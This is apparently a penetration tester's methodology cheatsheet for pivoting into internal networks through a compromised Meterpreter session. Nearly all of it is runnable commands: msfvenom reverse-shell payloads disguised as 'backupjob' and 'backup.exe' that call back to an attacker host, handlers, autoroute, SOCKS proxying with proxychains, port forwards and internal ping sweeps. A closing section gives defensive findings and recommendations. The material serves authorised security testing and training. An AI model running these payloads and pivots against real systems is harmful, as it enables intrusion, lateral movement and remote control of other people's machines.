🛡️ Methodology Checklist
- Gain Meterpreter session on pivot host
- Add route:
run post/multi/manage/autoroute SUBNET=[INTERNAL_NET] NETMASK=255.255.255.0 - Background session and start SOCKS proxy:
use auxiliary/server/socks_proxy; set SRVPORT 1080; set VERSION 5; run
- Configure
/etc/proxychains.conf:socks5 127.0.0.1 1080 - Run tools through Proxychains against internal targets
- Single port forward:
portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP] - Internal ARP scan:
run post/multi/gather/arp_scanner RHOSTS=[SUBNET]
🎯 Operational Context
Use when: Active Meterpreter session on a dual-homed host — add routes and start SOCKS proxy to pivot into the internal network.
Think Dumber First: run post/multi/manage/autoroute SUBNET=[INTERNAL_NET] then use auxiliary/server/socks_proxy; set SRVPORT 1080; run. Two commands, done. All MSF modules can now reach the internal subnet directly.
Skip when: Meterpreter session is unstable — establish stable session first before pivoting; route through unstable session risks losing all pivot access.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf -o backupjob | Generate Linux pivot payload |
run post/multi/gather/ping_sweep RHOSTS=[SUBNET]/23 | Meterpreter — ping sweep internal subnet |
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); done | Linux bash ping sweep (from shell on pivot) |
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" | Windows CMD ping sweep |
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} | PowerShell ping sweep |
use post/multi/manage/autoroute → set SESSION 1 → set SUBNET 172.16.5.0 → run | Add route to internal subnet through Meterpreter session |
run post/multi/manage/autoroute ACTION=list | Verify active routes |
use auxiliary/server/socks_proxy → set SRVPORT 9050 → set version 4a → run | Start SOCKS4a proxy in MSF for external tool tunneling |
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn | Scan internal host via MSF SOCKS tunnel |
meterpreter > portfwd add -l [LPORT] -p [TARGET_PORT] -r [INTERNAL_IP] | Local port forward (like ssh -L) |
meterpreter > portfwd add -R -l [LPORT_ATTACKER] -p [PIVOT_LISTEN_PORT] -L [LHOST] | Reverse port forward (like ssh -R) |
xfreerdp /v:localhost:[LPORT] /u:[USER] /p:[PASS] | Connect to forwarded RDP port |
meterpreter > portfwd flush | Remove all port forwarding rules |
🔬 Deep Dive & Workflow
When to Use Meterpreter Pivoting
Use when SSH credentials are unavailable, SSH is blocked, or when already operating within Metasploit and want to avoid context-switching.
Full Workflow
Step 1: Compromise the pivot host
# Generate payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=8080 -f elf -o backupjob
# Catch it
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0; set lport 8080; runStep 2: Internal recon
# From Meterpreter — uses victim's network stack
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
# Alternative: drop to shell and use bash/cmd loops (stealthier)
meterpreter > shell
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); doneStep 3: Add route + SOCKS proxy
# Tell MSF which subnet lives behind this session
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run
run post/multi/manage/autoroute ACTION=list # verify
# Start SOCKS4a proxy
use auxiliary/server/socks_proxy
set SRVPORT 9050; set SRVHOST 0.0.0.0; set version 4a; run
# Configure proxychains
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.confStep 4: Tunnel tools
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn # -sT and -Pn mandatory
proxychains msfconsoleportfwd — Direct Port Mapping
Local forward (access a remote service locally):
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
# Now connect: xfreerdp /v:localhost:3300 /u:victor /p:pass@123Reverse forward (catch shell from deep target):
# 1. Tell pivot to listen on 1234 and forward to attack host on 8081
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
# 2. Generate payload pointing to PIVOT's internal IP, port 1234
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 LPORT=1234 -f exe -o backup.exe
# 3. Start handler on attack host (8081)
use exploit/multi/handler; set LPORT 8081; runAutoRoute vs portfwd
| Feature | AutoRoute + SOCKS | portfwd |
|---|---|---|
| Use case | Scanning, multiple tools, Nmap | Specific app (RDP, web, shells) |
| Speed | Slower | Faster |
| Stability | Can break under heavy load | Generally stable |
Debug tip: If proxychains fails, check run autoroute -p inside Meterpreter. Missing route = SOCKS proxy has nowhere to send traffic.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| autoroute fails | Session not Meterpreter | Upgrade shell to Meterpreter first: use post/multi/manage/shell_to_meterpreter |
| SOCKS proxy module conflicts | Port 1080 already in use | Change port: set SRVPORT 1090; update proxychains.conf to match |
| Internal hosts unreachable via proxychains | Route not covering target subnet | Check subnet: run post/multi/manage/autoroute -p to print routes; add missing subnet |
| MSF modules work but proxychains tools fail | DNS not routed | Add DNS resolver route: run post/multi/manage/autoroute SUBNET=[DC_IP]/32 |
| Port forward via Meterpreter | Single service access needed | portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP]; simpler than full SOCKS for single service |
📝 Reporting Trigger
Finding Title: Meterpreter Autoroute Pivots Through Compromised Host to Internal Network Impact: Meterpreter autoroute establishes transparent routing through the compromised host to internal network segments, enabling direct MSF module execution against previously unreachable internal systems without additional tools. Root Cause: Compromised host acts as unmonitored bridge between network segments. No behavioral detection of Meterpreter SOCKS proxy or route establishment. Recommendation: Implement network segmentation that prevents dual-homed hosts from bridging security zones. Monitor for unusual inter-segment connections from management hosts. Deploy Meterpreter-specific EDR signatures.